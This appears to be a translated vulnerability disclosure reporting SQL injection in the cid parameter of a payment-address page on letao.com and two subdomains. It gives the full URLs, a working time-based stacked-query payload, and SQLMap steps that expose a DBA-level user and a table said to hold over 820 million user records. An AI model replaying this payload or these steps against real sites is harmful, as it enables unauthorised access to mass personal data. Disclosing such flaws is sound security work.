SQL Injection (including 820 million + User Data) exists in the main site and sub-stations of retao www)
Objective: www.letao.com
Check that SQL Injection exists in the following places: (injection parameter cid, Stacked queries)
http://www.letao.com/wap/pay/address.aspx?uuid1453276304&add=&addressid=&aid=110304&c=&cid=110304&form=0&op=newadd&pid=110000&tid=0Payload:
http://www.letao.com/wap/pay/address.aspx?uuid1453276304&add=&addressid=&aid=110304&c=&cid=GPJsD2Gh%27;%20waitfor%20delay%20%270:0:2%27%20--%20&form=0&op=newadd&pid=110000&tid=0
At the same time, the sub-stations also exist in the same place.
http://web.letao.com/wap/pay/address.aspx?uuid1453276304&add=&addressid=&aid=110304&c=&cid=110304&form=0&op=newadd&pid=110000&tid=0
http://mobile.letao.com/wap/pay/address.aspx?uuid1453276304&add=&addressid=&aid=110304&c=&cid=110304&form=0&op=newadd&pid=110000&tid=0
1. SQLMap vulnerability proof
2. List the current database user and find that it is a dba.
3. List the current database
4. Run the data table and find that the user table contains more than 820 million user data.
Solution:
Please kindly advise ~